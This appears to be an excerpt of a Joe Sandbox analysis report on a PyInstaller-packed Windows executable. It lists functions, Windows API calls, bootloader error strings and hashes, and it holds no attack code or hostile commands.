p, xrefs: 00007FF6850C1252
f, xrefs: 00007FF6850C124A
p, xrefs: 00007FF6850C11ED
f, xrefs: 00007FF6850C1395
f, xrefs: 00007FF6850C11E0

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
Instruction ID: 143e236893e209839740d347c9999bf5bc44547be70dce459db8fff36d6b261e
Opcode Fuzzy Hash: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
Instruction Fuzzy Hash: 4E129236E0C143C6FB209A55E1546B97261FF42FB6F884139E69A866C4DF3CEC80DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B15A0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6850B1609
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6850B15D3
fseek, xrefs: 00007FF6850B1610
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6850B16C2
fread, xrefs: 00007FF6850B16C9
malloc, xrefs: 00007FF6850B1640
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6850B1639

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 6b9a6c4333214f139a40b945d1f460a1e464d0b1d53d7e46c317f83f46444753
Instruction ID: ee3e38473db0ffa2d9f26a10885a67184b21112adf5ffd4c54955c66b24591af
Opcode Fuzzy Hash: 6b9a6c4333214f139a40b945d1f460a1e464d0b1d53d7e46c317f83f46444753
Instruction Fuzzy Hash: 15316021B08643C6EE24AB51E8915BA63A1FF04FE4F584139DE4D87A95EE3CED45C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850BEB00 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6850BEB5D

Part of subcall function 00007FF6850BFA70: __GetUnwindTryBlock.LIBCMT ref: 00007FF6850BFAB3
Part of subcall function 00007FF6850BFA70: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6850BFAD8

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6850BEC35
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6850BEE8A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6850BEF96

Strings

csm, xrefs: 00007FF6850BEB77
csm, xrefs: 00007FF6850BEBDE
csm, xrefs: 00007FF6850BEC58

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
Instruction ID: adc4915d2dc749af2ac2114a9dd9e862144e61dfbbaea954e819823a3fdb8b56
Opcode Fuzzy Hash: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
Instruction Fuzzy Hash: 85E19372A08742C6EB20AF65D4813AD77A0FF44BA8F144539EE4D97B95CF38E981C702

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B86B0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6850B101D), ref: 00007FF6850B8747
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6850B101D), ref: 00007FF6850B879E

Strings

WideCharToMultiByte, xrefs: 00007FF6850B87E6
win32_utils_to_utf8, xrefs: 00007FF6850B87D6
Failed to encode wchar_t as UTF-8., xrefs: 00007FF6850B87C6
Failed to get UTF-8 buffer size., xrefs: 00007FF6850B87DF
Out of memory., xrefs: 00007FF6850B87CF

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 626452242-27947307
Opcode ID: 3222192ef3eb6425b90c8fe8893bd4888df718eae9d290d6a680516fc0250b2d
Instruction ID: a19193bc4884b0e0f78466f2663b8fe60c0902b48dc3fc52a9e0e06246a66db4
Opcode Fuzzy Hash: 3222192ef3eb6425b90c8fe8893bd4888df718eae9d290d6a680516fc0250b2d
Instruction Fuzzy Hash: D5417236A08B82C2E620DF15B88017AB7A5FF88BA4F544139DA8D97BA4DF3CD855D700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B8BF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00007FF6850B39EA), ref: 00007FF6850B8C31

Part of subcall function 00007FF6850B29E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6850B87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6850B101D), ref: 00007FF6850B2A14
Part of subcall function 00007FF6850B29E0: MessageBoxW.USER32 ref: 00007FF6850B2AF0

WideCharToMultiByte.KERNEL32(?,00007FF6850B39EA), ref: 00007FF6850B8CA5

Strings

WideCharToMultiByte, xrefs: 00007FF6850B8C45, 00007FF6850B8CB6
win32_utils_to_utf8, xrefs: 00007FF6850B8C72
Failed to encode wchar_t as UTF-8., xrefs: 00007FF6850B8CAF
Failed to get UTF-8 buffer size., xrefs: 00007FF6850B8C3E
Out of memory., xrefs: 00007FF6850B8C6B

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 3723044601-27947307
Opcode ID: 7cfc53ec1e7d7e3796f815228c84741cfee21f3cfb1208b0d82f5073ed857cdd
Instruction ID: ecd5cbb3a7844ad6bb331576863e40ca7802874df599b2adb83057a49d769ebd
Opcode Fuzzy Hash: 7cfc53ec1e7d7e3796f815228c84741cfee21f3cfb1208b0d82f5073ed857cdd
Instruction Fuzzy Hash: 93215CB2A09B46C5EA10EF16E8810797761FF84FA0B984639DA4DC77A4EF3CE905D740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B75A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6850B7716

Part of subcall function 00007FF6850C0250: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C0264

Part of subcall function 00007FF6850C0224: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C0238

Strings

WARNING: file already exists but should not: %s, xrefs: 00007FF6850B7698
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF6850B7632
ERROR: file already exists but should not: %s, xrefs: 00007FF6850B767C
%s%c%s, xrefs: 00007FF6850B75E5
\, xrefs: 00007FF6850B75EC

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_fread_nolock
String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
API String ID: 3231891352-3501660386
Opcode ID: bcf1bab17151b9b867e8af5c18e0028d1d58eb22676ef18991cc143743397808
Instruction ID: 333c4b4dff78d89887b72de7c8dca04c9fd60fb7c5fb4620d2da1a805f247c20
Opcode Fuzzy Hash: bcf1bab17151b9b867e8af5c18e0028d1d58eb22676ef18991cc143743397808
Instruction Fuzzy Hash: 7051A121A0D643C1FA11BB259A912B96291BF85FB0F540138ED0EC77D7EE2CED09C351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850BDDB8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6850BE06A,?,?,?,00007FF6850BDD5C,?,?,00000001,00007FF6850BD979), ref: 00007FF6850BDE3D
GetLastError.KERNEL32(?,?,?,00007FF6850BE06A,?,?,?,00007FF6850BDD5C,?,?,00000001,00007FF6850BD979), ref: 00007FF6850BDE4B
LoadLibraryExW.KERNEL32(?,?,?,00007FF6850BE06A,?,?,?,00007FF6850BDD5C,?,?,00000001,00007FF6850BD979), ref: 00007FF6850BDE75
FreeLibrary.KERNEL32(?,?,?,00007FF6850BE06A,?,?,?,00007FF6850BDD5C,?,?,00000001,00007FF6850BD979), ref: 00007FF6850BDEBB
GetProcAddress.KERNEL32(?,?,?,00007FF6850BE06A,?,?,?,00007FF6850BDD5C,?,?,00000001,00007FF6850BD979), ref: 00007FF6850BDEC7

Strings

api-ms-, xrefs: 00007FF6850BDE5D

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
Instruction ID: 51c3a32361421db3110842b4fcf50987ac0dddf6b96ad809ba8673d8bdf45cc9
Opcode Fuzzy Hash: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
Instruction Fuzzy Hash: 18319222A1A64AD5EE51BF02A84067963D4BF58FB0F59063DDD2D9A380EF3DE844C705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B7420 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6850B8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6850B2ABB), ref: 00007FF6850B8B1A

ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6850B79A1,00000000,?,00000000,00000000,?,00007FF6850B154F), ref: 00007FF6850B747F

Part of subcall function 00007FF6850B2B30: MessageBoxW.USER32 ref: 00007FF6850B2C05

Strings

LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6850B7456
LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6850B74DA
LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6850B7493

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
API String ID: 1662231829-3498232454
Opcode ID: 1d2d4af577e045dbc33e2ebeb30eaa17cd958ec32487233d1e031d2a4712b08d
Instruction ID: 8ff6f9d300b71e99179f398b35d51b66c67e85741530814020994644dc9e4630
Opcode Fuzzy Hash: 1d2d4af577e045dbc33e2ebeb30eaa17cd958ec32487233d1e031d2a4712b08d
Instruction Fuzzy Hash: 3B318251B19686C1FE24F721A9953BA5291BF98FA0F84443DDA4EC2797EE2CED08C601

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B8AE0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6850B2ABB), ref: 00007FF6850B8B1A

Part of subcall function 00007FF6850B29E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6850B87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6850B101D), ref: 00007FF6850B2A14
Part of subcall function 00007FF6850B29E0: MessageBoxW.USER32 ref: 00007FF6850B2AF0

MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6850B2ABB), ref: 00007FF6850B8BA0

Strings

Failed to get wchar_t buffer size., xrefs: 00007FF6850B8B27
MultiByteToWideChar, xrefs: 00007FF6850B8B2E, 00007FF6850B8BB1
win32_utils_from_utf8, xrefs: 00007FF6850B8B69
Failed to decode wchar_t from UTF-8, xrefs: 00007FF6850B8BAA
Out of memory., xrefs: 00007FF6850B8B62

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
API String ID: 3723044601-876015163
Opcode ID: a541b9d7990873fa03eea91fa1c4eed32b472e1874b52a165eeb314caebc5777
Instruction ID: 5b0945cb9a976d0ee97229decc7fb5d698c2fad04248610281885fc6186c6c3c
Opcode Fuzzy Hash: a541b9d7990873fa03eea91fa1c4eed32b472e1874b52a165eeb314caebc5777
Instruction Fuzzy Hash: 4E217466B08A46C1EF50DB29F841069A361FF84BE4F984279DB4CD3B69EF2CD941C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CB710 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6850CB71F
FlsGetValue.KERNEL32 ref: 00007FF6850CB734
FlsSetValue.KERNEL32 ref: 00007FF6850CB755
FlsSetValue.KERNEL32 ref: 00007FF6850CB782
FlsSetValue.KERNEL32 ref: 00007FF6850CB793
FlsSetValue.KERNEL32 ref: 00007FF6850CB7A4
SetLastError.KERNEL32 ref: 00007FF6850CB7BF

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 5e25a57dc3899cb5d9e1114fbc8c557aa55031a2469902f6cab5e8a78f8e35b9
Instruction ID: 6de2ea405872efe774e16cfc4d55435810bc3148eff9eb1e9798a63b91e9be33
Opcode Fuzzy Hash: 5e25a57dc3899cb5d9e1114fbc8c557aa55031a2469902f6cab5e8a78f8e35b9
Instruction Fuzzy Hash: 5C213924A0C647C2FA646721565513962427F46FB0F54473CEE3EC6BC6DF2CAD41C621

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850D85BC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6850D85ED
GetLastError.KERNEL32 ref: 00007FF6850D85F9
CloseHandle.KERNEL32 ref: 00007FF6850D8611
CreateFileW.KERNEL32 ref: 00007FF6850D863C
WriteConsoleW.KERNEL32 ref: 00007FF6850D865B

Strings

CONOUT$, xrefs: 00007FF6850D861D

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
Instruction ID: d58239474214bfdd14c8894b697226e8e5c81ce35967d516efa29469c7f0b3a2
Opcode Fuzzy Hash: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
Instruction Fuzzy Hash: 5C114921B18A42CAE7508B52A85472966A0FF88FF4F544338EA5EC77A8DF7CD844CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CB888 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6850C54CD,?,?,?,?,00007FF6850CF1BF,?,?,00000000,00007FF6850CB9A6,?,?,?), ref: 00007FF6850CB897
FlsSetValue.KERNEL32(?,?,?,00007FF6850C54CD,?,?,?,?,00007FF6850CF1BF,?,?,00000000,00007FF6850CB9A6,?,?,?), ref: 00007FF6850CB8CD
FlsSetValue.KERNEL32(?,?,?,00007FF6850C54CD,?,?,?,?,00007FF6850CF1BF,?,?,00000000,00007FF6850CB9A6,?,?,?), ref: 00007FF6850CB8FA
FlsSetValue.KERNEL32(?,?,?,00007FF6850C54CD,?,?,?,?,00007FF6850CF1BF,?,?,00000000,00007FF6850CB9A6,?,?,?), ref: 00007FF6850CB90B
FlsSetValue.KERNEL32(?,?,?,00007FF6850C54CD,?,?,?,?,00007FF6850CF1BF,?,?,00000000,00007FF6850CB9A6,?,?,?), ref: 00007FF6850CB91C
SetLastError.KERNEL32(?,?,?,00007FF6850C54CD,?,?,?,?,00007FF6850CF1BF,?,?,00000000,00007FF6850CB9A6,?,?,?), ref: 00007FF6850CB937

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 941158fb4e6d3a9375e13d6d10033e8ffcdbbced4d4dd5e625aa307a16b34608
Instruction ID: 5c91574d85de81c9bde898139ff1826c1839e1685e93041c388ad6cb37ee0090
Opcode Fuzzy Hash: 941158fb4e6d3a9375e13d6d10033e8ffcdbbced4d4dd5e625aa307a16b34608
Instruction Fuzzy Hash: 83112120A0C647C2F654A73155951396291BF46FB0F54473CD93ECA7D6DF2CAD42C721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850BD778 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6850BD7A3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6850BD838
RtlUnwindEx.KERNEL32 ref: 00007FF6850BD887

Strings

csm, xrefs: 00007FF6850BD81E
f, xrefs: 00007FF6850BD7B6

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
Instruction ID: 6bb02ce6b52d97f964680f7882c1e21a767f5d77d7ace54d677d31dbd4080b59
Opcode Fuzzy Hash: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
Instruction Fuzzy Hash: A1519F33E19606CAEB14EB15E484B29B7A5FF80FA8F508178DA5A87748DF38ED41C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B2600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00007FF6850B27EF), ref: 00007FF6850B2638
DialogBoxIndirectParamW.USER32 ref: 00007FF6850B26FC
DeleteObject.GDI32 ref: 00007FF6850B272F
DestroyIcon.USER32 ref: 00007FF6850B2741

Strings

Unhandled exception in script, xrefs: 00007FF6850B2668

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: aedd94d896d3770322b3bc916a57fa4c811986127e2200c50fe109d0e77cca38
